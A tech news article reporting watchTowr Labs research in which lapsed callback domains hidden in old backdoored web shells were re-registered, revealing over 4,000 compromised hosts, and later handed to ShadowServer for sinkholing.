Crims backdoored the backdoors they supplied to other miscreants. Then the domains lapsed
Here's what $20 gets you these days
More than 4,000 unique backdoors are using expired domains and/or abandoned infrastructure, and many of these expose government and academia-owned hosts – thus setting these hosts up for hijacking by criminals who likely have less altruistic intentions than the security researchers who uncovered the very same backdoors.
In its latest who-can-we-pwn expedition, the watchTowr Labs team set its sights on web shells. The end result is equal parts schadenfreude at witnessing attackers' security snafus and the discovery of real risks associated with abandoned domain names.
"The access here that we're demonstrating is effectively what we've affectionately termed mass-hacking-on-autopilot," watchTowr CEO Benjamin Harris told The Register.
"Imagine you want to gain access to thousands of systems, but don't feel like investing the effort to identify and compromise systems yourself – or getting your hands dirty," he continued.
"Instead, you commandeer abandoned backdoors in regularly used backdoors to effectively 'steal the spoils' of someone else's work, giving you the same access to a compromised system as the person who put the effort into identifying the mechanism to compromise, and performing the compromise of said system in the first place."
Once an attacker has that access, they can access all the data on the compromised host and/or use it to launch future attacks.
"Zero effort, same result – for the price of a domain," Harris said.
You commandeer abandoned backdoors in regularly used backdoors to effectively steal the spoils of someone else's work
And, as was the case in an earlier watchTowr effort, the price tag on that abandoned criminal infrastructure was a mere $20 per domain.
This report, published Wednesday, follows the watchTowr crew's earlier research that also delved into abandoned and expired infrastructure. But in this case, the team examined how the "bad guys" throw away internet domains too.
Plus, they also highlight how attackers have historically backdoored the web shells they provide to other miscreants – thus giving the original author of the web shell access to everything that the current user touches.
These backdoored backdoors run the gamut from basic web shells to c99shell, r57shell, and China Chopper, just to name a few of the "all-bells-and-whistles" web shells that include functions "to allow hackers to hack hackers," according to Harris and co-author Aliz Hammond:
Adapting some internal code, we went on a mission – collect as many web shells as possible (regardless of language, target, or age), de-obfuscate any code that happened to be protected by the power of base64, and extract any unregistered domains likely used in some sort of callback function.
We then hooked that up to the AWS Route53 API, and just bought them en masse.
Honestly, it's $20, and we've done worse with more.
The researchers registered more than 40 domains (a list of several of these web shells and associated domains is listed in the report), spun up new infrastructure, and then logged incoming requests before responding with a 404 error message.
The team logged "thousands" of requests, Harris said, adding that these were "primarily across a handful of the domains that we identified and re-registered."
After slogging through logs of incoming requests to watchTowr's newly accrued domains, the researchers found "multiple" compromised government-owned hosts from Bangladesh, China, Nigeria, and other countries, as well as higher-education entities across Thailand, China, and South Korea.
- How $20 and a lapsed domain allowed security pros to undermine internet integrity
- Here's what happens if you don't layer network security – or remove unused web shells
- PoC exploit chains Mitel MiCollab 0-day, auth-bypass bug to access sensitive files
- HTTP your way into Citrix's Virtual Apps and Desktops with fresh exploit code
Among these high-value domains: one belonging to the Federal High Court of Nigeria, for example, had four different web shells pinging it, we're told. "So far we've found over 4,000 breached systems (three or four of which are breached.gov systems)," the duo wrote. "The number keeps going up – as you would expect."
As with watchTowr's earlier research, the team didn't want to let its 40-some web shell domains it registered lapse as their predecessors had.
"For the same reasons that both this research and the .MOBI research came to exist, we would be guilty of the exact same careless disposal of infrastructure if we were to let these domains expire as their previous owners did," Harris said.
To this end, the ShadowServer Foundation agreed to take ownership of the domains and sinkhole them.
Harris described the research as "morbid curiosity." The security shop's researchers would "watch the logs and find out what system we'd see compromised next," he told The Register.
It also held some nostalgia for the team: "As alluded to in the post, we're sure a lot of the cybersecurity industry is familiar with and likely grew up with a number of web shells that we discuss in our research," he added. "The reality, though, is that we consider this a 'peek behind the curtain' of activity that circles the internet every day, and can be incredibly interesting to watch play out in literal real time." ®